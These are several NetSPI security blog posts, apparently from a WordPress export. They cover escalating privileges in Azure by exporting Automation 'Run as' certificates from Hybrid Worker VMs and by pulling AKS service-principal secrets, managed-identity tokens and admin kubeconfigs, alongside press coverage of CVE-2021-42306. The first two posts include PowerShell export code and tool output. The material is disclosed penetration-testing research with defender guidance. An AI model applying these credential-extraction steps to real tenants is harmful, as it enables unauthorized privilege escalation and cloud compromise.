For those that need more computing resources (CPU, RAM, Disk, Time) to run their Automation Account runbooks, there is an option to add Hybrid Workers to an Automation Account. These Hybrid Workers can be Azure Virtual Machines (VMs) or Arc-enabled servers, and they allow for additional computing flexibility over the normal limitations of the Automation Account hosted environment. Typically, I’ve seen Hybrid Workers as Windows-based Azure VMs, as that’s the easiest way to integrate with the Automation Account runbooks. 

Add Hybrid Workers to an Automation Account

In this article, we’re going to focus on instances where the Hybrid Workers are Windows VMs in Azure. They’re the most common configuration that we run into, and the Linux VMs in Azure can’t be configured to use the “Run as” certificates, which are the target of this blog.

The easiest way to identify Automation Accounts that use Hybrid Workers is to look at the “Hybrid worker groups” section of an Automation Account in the portal. We will be focusing on the “User” groups, versus the “System” groups for this post. 


Additionally, you can use the Az PowerShell cmdlets to identify the Hybrid Worker groups, or you can enumerate the VMs that have the “HybridWorkerExtension” VM extension installed. I’ve found this last method is the most reliable for finding potentially vulnerable VMs to attack.
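A quick sketch of that last method (the extension name match is based on what we have seen in testing, so verify it in your own environment):

```powershell
# Flag any VM in the current subscription running the Hybrid Worker extension
Get-AzVM | ForEach-Object {
    $extensions = Get-AzVMExtension -ResourceGroupName $_.ResourceGroupName -VMName $_.Name
    if ($extensions | Where-Object { $_.Name -eq 'HybridWorkerExtension' }) {
        $_ | Select-Object Name, ResourceGroupName, Location
    }
}
```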

Additional Azure Automation Accounts Research:

Running Jobs on the Workers

To run jobs on the Hybrid Worker group, you can modify the “Run settings” in any of your runbook execution options (Schedules, Webhook, Test Pane) to “Run on” the Hybrid Worker group.


When the runbook code is executed on the Hybrid Worker, it is run as the “NT AUTHORITY\SYSTEM” account in Windows, or “root” in Linux. If an Azure AD user has a role (Automation Contributor) with Automation Account permissions, and no VM permissions, this could allow them to gain privileged access to VMs.

We will go over this in greater detail in part two of this blog, but Hybrid Workers utilize an undocumented internal API to poll for information about the Automation Account (Runbooks, Credentials, Jobs). As part of this, the Hybrid Workers are not supposed to have direct access to the certificates that are used as part of the traditional “Run As” process. As you will see in the following blog, this isn’t totally true.

To make up for the lack of immediate access to the “Run as” credentials, Microsoft recommends exporting the “Run as” certificate from the Automation Account and installing it on each Hybrid Worker in the group of workers. Once installed, the “Run as” credential can then be referenced by the runbook, to authenticate as the app registration.

If you have access to an Automation Account, keep an eye out for any lingering “Export-RunAsCertificateToHybridWorker” runbooks that may indicate the usage of the “Run as” certificates on the Hybrid Workers.


The issue with installing these “Run As” certificates on the Hybrid Workers is that anyone with local administrator access to the Hybrid Worker can extract the credential and use it to authenticate as the “Run as” account. Given that “Run as” accounts are typically configured with the Contributor role at the subscription scope, this could result in privilege escalation.

Extracting “Run As” Credentials from Hybrid Workers

We have two different ways of accessing Windows VMs in Azure, direct authentication (Local or Domain accounts) and platform level command execution (VM Run Command in Azure). Since there are a million different ways that someone could gain access to credentials with local administrator rights, we won’t be covering standard Windows authentication. Instead, we will briefly cover the multiple Azure RBAC roles that allow for various ways of command execution on Azure VMs.

Affected Roles:

Where noted above (VM Extension Rights), the VM Extension command execution method comes from the following NetSPI blog: Attacking Azure with Custom Script Extensions.

Since the above roles are not the full Contributor role on the subscription, it is possible for someone with one of the above roles to extract the “Run as” credentials from the VM (see below) to escalate to a subscription Contributor. This is a somewhat similar escalation path to the one that we previously called out for the Log Analytics Contributor role.

Exporting the Certificate from the Worker

As a local administrator on the Hybrid Worker VM, it’s fairly simple to export the certificate. With Remote Desktop Protocol (RDP) access, we can just manually go into the certificate manager (certmgr), find the “Run as” certificate, and export it to a pfx file.
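The same export can be scripted. A minimal sketch, run as a local administrator on the worker (the subject match and output path are illustrative; "Run as" certificate subjects typically start with "DC=", as seen in the output later in this post):

```powershell
# Find an exportable Run As certificate in the local machine store
$cert = Get-ChildItem Cert:\LocalMachine\My |
    Where-Object { $_.HasPrivateKey -and $_.Subject -match '^DC=' } |
    Select-Object -First 1

# Export it, private key included, to a password-protected pfx
$pfxPassword = ConvertTo-SecureString 'ExamplePassword123!' -AsPlainText -Force
Export-PfxCertificate -Cert $cert -FilePath 'C:\temp\runas.pfx' -Password $pfxPassword
```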


At this point we can copy the file from the Hybrid Worker to use for authentication on another system. Since this is a bit tedious to do at scale, we’ve automated the whole process with a PowerShell script.

Automating the Process

The following script is in the MicroBurst repository under the “Az” folder:

https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzHybridWorkerExtraction.ps1

This script will enumerate any running Windows virtual machines configured with the Hybrid Worker extension and will then run commands on the VMs (via Invoke-AzVMRunCommand) to export the available private certificates. Assuming the Hybrid Worker is only configured with one exportable private certificate, this will return the certificate as a Base64 string in the run command output.

PS C:\temp\hybrid> Invoke-AzHybridWorkerExtraction -Verbose
VERBOSE: Logged In as kfosaaen@notarealdomain.com
VERBOSE: Getting a list of Hybrid Worker VMs
VERBOSE: 	Running extraction script on the HWTest virtual machine
VERBOSE: 		Looking for the attached App Registration... This may take a while in larger environments
VERBOSE: 			Writing the AuthAs script
VERBOSE: 		Use the C:\temp\HybridWorkers\AuthAsNetSPI_tester_[REDACTED].ps1 script to authenticate as the NetSPI_sQ[REDACTED]g= App Registration
VERBOSE: 	Script Execution on HWTest Completed
VERBOSE: Run as Credential Dumping Activities Have Completed

The script will then write this Base64 certificate data to a file and use the resulting certificate thumbprint to match against App Registration credentials in Azure AD. This will allow the script to find the App Registration Client ID that is needed to authenticate with the exported certificate.

Finally, this will create an “AuthAs” script (noted in the output) that can be used to authenticate as the “Run as” account, with the exported private certificate.

PS C:\temp\hybrid> ls | select Name, Length
Name                                        Length
----                                        ------
AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1   1018
NetSPI_tester_[Redacted_Sub_ID].pfx         2615

This script can be run with any RBAC role that has VM “Run Command” rights on the Hybrid Workers to extract out the “Run as” credentials.

Authenticating as the “Run As” Account

Now that we have the certificate, we can use the generated script to authenticate to the subscription as the “Run As” account. This is very similar to what we do with exporting credentials in the Get-AzPasswords function, so this may look familiar.

PS C:\temp\hybrid> .\AuthAsNetSPI_tester_[Redacted_Sub_ID].ps1
   PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My
Thumbprint                                Subject
----------                                -------
BDD023EC342FE04CC1C0613499F9FF63111631BB  DC=NetSPI_tester_[Redacted_Sub_ID]

Environments : {[AzureChinaCloud, AzureChinaCloud], [AzureCloud, AzureCloud], [AzureGermanCloud, AzureGermanCloud], [AzureUSGovernment, AzureUSGovernment]}
Context      : Microsoft.Azure.Commands.Profile.Models.Core.PSAzureContext

PS C:\temp\hybrid> (Get-AzContext).Account                                                                               
Id                    : 52[REDACTED]57
Type                  : ServicePrincipal
Tenants               : {47[REDACTED]35}
Credential            :
TenantMap             : {}
CertificateThumbprint : BDD023EC342FE04CC1C0613499F9FF63111631BB
ExtendedProperties    : {[Subscriptions, d4[REDACTED]b2], [Tenants, 47[REDACTED]35], [CertificateThumbprint, BDD023EC342FE04CC1C0613499F9FF63111631BB]}

Alternative Options

Finally, any user with the ability to run commands as “NT AUTHORITY\SYSTEM” on the Hybrid Workers is also able to assume the authenticated Azure context that results from authenticating (Connect-AzAccount) to Azure while running a job as a Hybrid Worker. 

This would result in users being able to run Az PowerShell module functions as the “Run as” account via the Azure “Run command” and “Extension” features that are available to many of the roles listed above. Assuming the “Connect-AzAccount” function was previously used with a runbook, an attacker could just use the run command feature to run other Az module functions with the “Run as” context.

Additionally, since the certificate is installed on the VM, a user could just use the certificate to directly authenticate from the Hybrid Worker, if there was no active login context.

Summary

In conjunction with the issues outlined in part two of this blog, we submitted our findings to MSRC.

Since this issue ultimately relies on an Azure administrator giving a user access to specific VMs (the Hybrid Workers), it’s considered a user misconfiguration issue. Microsoft has updated their documentation to reflect the potential impact of installing the “Run as” certificate on the VMs. Additionally, you could also modify the certificate installation process to mark the certificates as “non-exportable” to help protect them.


We would recommend against using “Run as” accounts for Automation Accounts and instead switch to using managed identities on the Hybrid Worker VMs.

Stay tuned to the NetSPI technical blog for the second half of this series that will outline how we were able to use a Reader role account to extract credentials and certificates from Automation Accounts. In subscriptions where Run As accounts were in use, this resulted in a Reader to Contributor privilege escalation.

Prior Work

While we were working on these blogs, the Azsec blog put out the “Laterally move by abusing Log Analytics Agent and Automation Hybrid worker” post that outlines some similar techniques to what we’ve outlined above. Read the post to see how they make use of Log Analytics to gain access to the Hybrid Worker groups.

[post_title] => Abusing Azure Hybrid Workers for Privilege Escalation – Part 1 [post_excerpt] => In this cloud penetration testing blog, learn how to abuse Azure Hybrid Workers for privilege escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => abusing-azure-hybrid-workers-for-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:20:54 [post_modified_gmt] => 2023-03-16 14:20:54 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27487 [menu_order] => 289 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 27255 [post_author] => 10 [post_date] => 2022-01-27 09:00:00 [post_date_gmt] => 2022-01-27 15:00:00 [post_content] =>

As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Services (AKS) being used in Azure subscriptions. The service itself can be complicated and have a large attack surface area. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.

While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.

What is Azure Kubernetes Service (AKS)?

In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant. 

Service Principal versus Managed Identity

When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it’s not a guarantee, by using an existing Service Principal, the attached identity may also have additional roles already assigned in the Azure tenant.

In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the “System-assigned” Managed Identity is actually a “User-assigned” Managed Identity that’s created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There’s no “Identity” menu in the AKS portal blade, so it’s my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods has its own benefits, and we will have different approaches to attacking each one.

Cluster Infrastructure

In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster. 

When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, and the name of the cluster. 

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.


Gathering Service Principal Credentials

First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.

In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.
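The azure.json file is plain JSON, so the interesting values are easy to pull out of the run-command output. The field names below (aadClientId, aadClientSecret, tenantId, subscriptionId) reflect the AKS cloud-provider configuration format, but treat this trimmed sample as representative rather than exhaustive:

```python
import json

# Representative (trimmed) azure.json content as returned by the run
# command; the real file contains many additional cloud-provider settings.
raw = '''{
    "tenantId": "00000000-0000-0000-0000-000000000000",
    "subscriptionId": "11111111-1111-1111-1111-111111111111",
    "aadClientId": "22222222-2222-2222-2222-222222222222",
    "aadClientSecret": "SuperSecretValue"
}'''

config = json.loads(raw)
# Pull out the fields needed to authenticate as the Service Principal
creds = {k: config[k] for k in ("tenantId", "aadClientId", "aadClientSecret")}
print(creds["aadClientId"])  # the Service Principal's application (client) ID
```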

The VMSS command execution can be done via the following options:

  • The Az PowerShell module (Invoke-AzVmssVMRunCommand)
  • The Az CLI (az vmss run-command invoke)
  • The Azure REST APIs (the VMSS runCommand action)

The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.

In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function. 

Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.

Privilege Escalation Potential

There is a notable issue here: Contributors on the subscription can gain access to a Service Principal credential for which they are not an Owner. If the Service Principal has additional permissions, this could allow the Contributor to escalate privileges.

In this example:

  • User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
  • User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
  • User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
  • User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on

This is illustrated in the diagram below.

Privilege Escalation Potential diagram

For all of the above, assume that both User A and User B have the Contributor role on the subscription and no additional roles assigned in the Azure AD tenant. Additionally, this attack could extend to the Virtual Machine Contributor role and any other role that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).

Gathering Managed Identity Credentials

If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have covered this general process in previous blog posts.

In this case, we will be using the VMSS command execution functionality to make a request to “http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/”. This will return a JWT that is scoped to the management.azure.com resource.
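The IMDS call itself is just an HTTP GET with a "Metadata: true" header. A minimal sketch of how that request is assembled (no network call is made here; the endpoint and api-version come straight from the URL above):

```python
from urllib.parse import urlencode

IMDS_TOKEN_ENDPOINT = "http://169.254.169.254/metadata/identity/oauth2/token"

def build_imds_token_request(resource: str, api_version: str = "2018-02-01"):
    """Return the (url, headers) pair for an IMDS managed-identity token request.

    IMDS only answers requests that carry the "Metadata: true" header,
    which blocks naive request-forwarding (SSRF-style) access to the endpoint.
    """
    query = urlencode({"api-version": api_version, "resource": resource})
    return f"{IMDS_TOKEN_ENDPOINT}?{query}", {"Metadata": "true"}

url, headers = build_imds_token_request("https://management.azure.com/")
print(url)
```

On a VMSS instance, issuing this request (for example with curl and the returned headers) yields a JSON body whose access_token field contains the JWT.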

For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other resources (e.g., Key Vault), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.

At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.

Gathering kubectl Credentials

As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.

Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.
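Under the hood, the cluster-admin kubeconfig comes back from the managedClusters listClusterAdminCredential ARM action as base64-encoded data in the response body. A rough sketch of the call shape follows; the api-version value and the exact response field names are assumptions that should be checked against current Azure REST documentation:

```python
import base64

ARM = "https://management.azure.com"

def admin_credential_url(sub: str, rg: str, cluster: str,
                         api_version: str = "2021-05-01") -> str:
    """Build the ARM URL for the AKS listClusterAdminCredential POST action."""
    return (f"{ARM}/subscriptions/{sub}/resourceGroups/{rg}"
            f"/providers/Microsoft.ContainerService/managedClusters/{cluster}"
            f"/listClusterAdminCredential?api-version={api_version}")

url = admin_credential_url("<sub-id>", "tester", "testCluster")
print(url)

# The response body is roughly of the form:
#   {"kubeconfigs": [{"name": "clusterAdmin", "value": "<base64 kubeconfig>"}]}
# Decoding the "value" field yields a usable kubeconfig file:
sample_value = base64.b64encode(b"apiVersion: v1\nkind: Config\n").decode()
kubeconfig = base64.b64decode(sample_value).decode()
```

The POST request must carry an "Authorization: Bearer <token>" header built from a management-scoped token such as the one Get-AzAccessToken returns.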

Once the config files are created, you can replace the existing kubeconfig file on your testing system, and you should have access to the AKS cluster. Ultimately, this will depend on the AKS cluster being reachable from your network location.

Conclusion

As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.

For the defenders reading this, Microsoft Security Center should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:

  • VMSS Command Execution
  • Issuing of Metadata tokens for Managed Identities
  • Generation of kubeconfig files

For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.

Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.

[post_title] => How To Extract Credentials from Azure Kubernetes Service (AKS) [post_excerpt] => In this penetration testing blog, we explain how to extract credentials from the Azure Kubernetes Service (AKS) using the Contributor role permissions on an AKS cluster. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extract-credentials-from-azure-kubernetes-service [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:22:34 [post_modified_gmt] => 2023-03-16 14:22:34 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27255 [menu_order] => 308 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 26753 [post_author] => 10 [post_date] => 2021-11-23 13:16:00 [post_date_gmt] => 2021-11-23 19:16:00 [post_content] =>

On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. Read the full article below or online here.

Microsoft has fixed a flaw in Azure that, according to the infosec firm that found and privately reported the issue, could be exploited by a rogue user within an Azure Active Directory instance "to escalate up to a Contributor role."

"If access to the Azure Contributor role is achieved, the user would be able to create, manage, and delete all types of resources in the affected Azure subscription," NetSPI said of the vulnerability, labeled CVE-2021-42306.

Essentially, an employee at a company using Azure Active Directory, for instance, could end up exploiting this bug to ruin an IT department or CISO's month. Microsoft said last week it fixed the problem within Azure:

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers.

We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

"The discovery of this vulnerability," said NetSPI's Karl Fosaaen, who found the security hole, "highlights the importance of the shared responsibility model among cloud providers and customers. It’s vital for the security community to put the world’s most prominent technologies to the test."

[post_title] => The Register: Microsoft squashes Azure privilege-escalation bug [post_excerpt] => On November 23, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Iain Thomson for The Register. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-register-microsoft-squashes-azure-privilege-escalation-bug [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:42 [post_modified_gmt] => 2022-12-16 16:51:42 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26753 [menu_order] => 335 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 26727 [post_author] => 10 [post_date] => 2021-11-18 18:47:00 [post_date_gmt] => 2021-11-19 00:47:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. Read the full article below or online here.

Microsoft recently mitigated an information disclosure issue, CVE-2021-42306, to prevent private key data from being stored by some Azure services in the keyCredentials property of an Azure Active Directory (Azure AD) Application and/or Service Principal, and prevent reading of private key data previously stored in the keyCredentials property.

The keyCredentials property is used to configure an application’s authentication credentials. It is accessible to any user or service in the organization’s Azure AD tenant with read access to application metadata.

The property is designed to accept a certificate with public key data for use in authentication, but certificates with private key data could have also been incorrectly stored in the property. Access to private key data can lead to an elevation of privilege attack by allowing a user to impersonate the impacted Application or Service Principal.

Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers. We have conducted an investigation and have found no evidence of malicious access to this data.

Microsoft Azure services affected by this issue have mitigated by preventing storage of clear text private key information in the keyCredentials property, and Azure AD has mitigated by preventing reading of clear text private key data that was previously added by any user or service in the UI or APIs.

As a result, clear text private key material in the keyCredentials property is inaccessible, mitigating the risks associated with storage of this material in the property.

As a precautionary measure, Microsoft is recommending customers using these services take action as described in “Affected products/services,” below. We are also recommending that customers who suspect private key data may have been added to credentials for additional Azure AD applications or Service Principals in their environments follow this guidance.

Affected products/services

Microsoft has identified the following platforms/services that stored their private keys in the public property. We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use.

Product/Service: Azure Automation uses the Application and Service Principal keyCredential APIs when Automation Run-As Accounts are created.
Microsoft’s Mitigation: Azure Automation deployed an update to the service to prevent private key data in clear text from being uploaded to Azure AD applications. Run-As accounts created or renewed after 10/15/2021 are not impacted and do not require further action.
Customer impact assessment and remediation: Automation Run-As accounts created with an Azure Automation self-signed certificate between 10/15/2020 and 10/15/2021 that have not been renewed are impacted. Separately, customers who bring their own certificates could be affected, regardless of the renewal date of the certificate. To identify and remediate impacted Azure AD applications associated with impacted Automation Run-As accounts, please navigate to this GitHub repo. In addition, Azure Automation supports Managed Identities (GA announced in October 2021). Migrating from Run-As accounts to Managed Identities will mitigate this issue. Please follow the guidance here to migrate.

Product/Service: The Azure Migrate service creates Azure AD applications to enable Azure Migrate appliances to communicate with the service’s endpoints.
Microsoft’s Mitigation: Azure Migrate deployed an update to prevent private key data in clear text from being uploaded to Azure AD applications. Azure Migrate appliances that were registered after 11/02/2021 and have Appliance configuration manager version 6.1.220.1 or above are not impacted and do not require further action.
Customer impact assessment and remediation: Azure Migrate appliances registered prior to 11/02/2021, and/or appliances registered after 11/02/2021 where auto-update was disabled, could be affected by this issue. To identify and remediate any impacted Azure AD applications associated with Azure Migrate appliances, please navigate to this link.

Product/Service: Azure Site Recovery (ASR) creates Azure AD applications to communicate with the ASR service endpoints.
Microsoft’s Mitigation: Azure Site Recovery deployed an update to prevent private key data from being uploaded to Azure AD applications. Customers using Azure Site Recovery’s preview experience “VMware to Azure Disaster Recovery” after 11/01/2021 are not impacted and do not require further action.
Customer impact assessment and remediation: Customers who have deployed and registered the preview version of the VMware to Azure DR experience with ASR before 11/01/2021 could be affected. To identify and remediate the impacted Azure AD applications associated with Azure Site Recovery appliances, please navigate to this link.

Product/Service: Azure AD applications and Service Principals [1]
Microsoft’s Mitigation: Microsoft has blocked reading private key data as of 10/30/2021.
Customer impact assessment and remediation: Follow the guidance available at aad-app-credential-remediation-guide to assess if your application key credentials need to be rotated. The guidance walks through the assessment steps to identify if private key information was stored in keyCredentials and provides remediation options for credential rotation.

[1] This issue only affects Azure AD Applications and Service Principals where private key material in clear text was added to a keyCredential. Microsoft recommends taking precautionary steps to identify any additional instances of this issue in applications where you manage credentials and take remediation steps if impact is found.

What else can I do to audit and investigate applications for unexpected use?

Additionally, as a best practice, we recommend auditing and investigating applications for unexpected use:

  • Audit the permissions that have been granted to the impacted entities (e.g., subscription access, roles, OAuth permissions, etc.) to assess impact in case the credentials were exposed. Refer to the Application permission section in the security operations guide.
  • If you rotated the credential for your application/service principal, we suggest investigating for unexpected use of the impacted entity especially if it has high privilege permissions to sensitive resources. Additionally, review the security guidance on least privilege access for apps to ensure your applications are configured with least privilege access.
  • Check sign-in logs, AAD audit logs and M365 audit logs, for anomalous activity like sign-ins from unexpected IP addresses.
  • Customers who have Microsoft Sentinel deployed in their environment can leverage notebook/playbook/hunting queries to look for potentially malicious activities. Look for more guidance here.
  • For more information refer to the security operations guidance.

Part of any robust security posture is working with researchers to help find vulnerabilities, so we can fix any findings before they are misused. We want to thank Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe.

[post_title] => ChannelPro Network: Azure Active Directory (AD) KeyCredential Property Information Disclosure [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Jay Ferron for ChannelPro Network. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => channelpro-network-azure-active-directory-ad-keycredential-property-information-disclosure [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26727 [menu_order] => 338 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 26733 [post_author] => 10 [post_date] => 2021-11-18 17:26:00 [post_date_gmt] => 2021-11-18 23:26:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. Read the full article below or online here.

Microsoft has recently addressed an information disclosure vulnerability, tracked as CVE-2021-42306, affecting Azure AD.

“An information disclosure vulnerability manifests when a user or an application uploads unprotected private key data as part of an authentication certificate keyCredential  on an Azure AD Application or Service Principal (which is not recommended). This vulnerability allows a user or service in the tenant with application read access to read the private key data that was added to the application.” reads the advisory published by Microsoft. “Azure AD addressed this vulnerability by preventing disclosure of any private key values added to the application. Microsoft has identified services that could manifest this vulnerability, and steps that customers should take to be protected. Refer to the FAQ section for more information.”

The vulnerability was discovered by Karl Fosaaen from NetSPI, it received a CVSS score of 8.1. Fosaaen explained that due to a misconfiguration in Azure, Automation Account “Run as” credentials (PFX certificates) ended up being stored in clear text in Azure AD and anyone with access to information on App Registrations can access them.

An attacker could use these credentials to authenticate as the App Registration, typically as a Contributor on the subscription containing the Automation Account.

“This issue stems from the way the Automation Account “Run as” credentials are created when creating a new Automation Account in Azure. There appears to have been logic on the Azure side that stores the full PFX file in the App Registration manifest, versus the associated public key.” reads the analysis published by NetSPI.

An attacker can exploit this flaw to escalate privileges to Contributor of any subscription that has an Automation Account, then access resources in the affected subscriptions, including sensitive information stored in Azure services and credentials stored in key vaults.

The issue could be potentially exploited to disable or delete resources and take entire Azure tenants offline.

Microsoft addressed the flaw by preventing Azure services from storing clear text private keys in the keyCredentials property and by preventing users from reading any private key data that has been stored in clear text.

[post_title] => Security Affairs: Microsoft addresses a high-severity vulnerability in Azure AD [post_excerpt] => On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Pierluigi Paganini for Security Affairs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => security-affairs-microsoft-addresses-a-high-severity-vulnerability-in-azure-ad [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:43 [post_modified_gmt] => 2022-12-16 16:51:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=26733 [menu_order] => 337 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 26728 [post_author] => 10 [post_date] => 2021-11-18 16:14:00 [post_date_gmt] => 2021-11-18 22:14:00 [post_content] =>

On November 18, 2021, NetSPI Director Karl Fosaaen was featured in an article written by Kurt Mackie for Redmond. Read the full article below or online here.

Microsoft announced on Wednesday that it fixed an Azure Active Directory private key data storage gaffe that affects Azure application subscribers, but affected organizations nonetheless should carry out specific assessment and remediation tasks.

Affected organizations were notified via the Azure Service Health Notifications message center, Microsoft indicated.

"We have notified customers who have impacted Azure AD applications created by these services and notified them via Azure Service Health Notifications to provide remediation guidance specific to the services they use."

The applications requiring investigation include Azure Automation (when used with "Run-As Accounts"), Azure Migrate, Azure Site Recovery, and Azure AD Applications and Service Principals. Microsoft didn't find evidence that the vulnerability was exploited, but advised organizations to conduct audits and investigate Azure apps for any permissions that may have been granted.

Microsoft also urged IT pros to enforce least-privilege access for apps and check the "sign-in logs, AAD audit logs and M365 audit logs for anomalous activity like sign-ins from unexpected IP addresses."

Private Key Data Exposed

The problem, in essence, was that Microsoft's Azure app installation processes were including private key data in a property used for public keys. The issue was initially flagged as CVE-2021-42306, an information disclosure vulnerability associated with Azure AD's keyCredentials property. Any user in an Azure AD tenancy can read the keyCredentials property, Microsoft's announcement explained:

The keyCredentials property is used to configure an application's authentication credentials. It is accessible to any user or service in the organization's Azure AD tenant with read access to application metadata.

The keyCredentials property is supposed to work only with public keys, but it was possible to store private key data in it, too, and that's where the Microsoft Azure app install processes blundered.

"Some Microsoft services incorrectly stored private key data in the (keyCredentials) property while creating applications on behalf of their customers," Microsoft explained.

The Microsoft Security Response Center (MSRC) credited the discovery of the issue to "Karl Fosaaen of NetSPI who reported this vulnerability and Allscripts who worked with the Microsoft Security Response Center (MSRC) under Coordinated Vulnerability Disclosure (CVD) to help keep Microsoft customers safe," the announcement indicated. 

Contributor Role Rights

The magnitude of the problem was explained in a NetSPI press release. NetSPI specializes in penetration testing and attack surface reduction services for organizations.

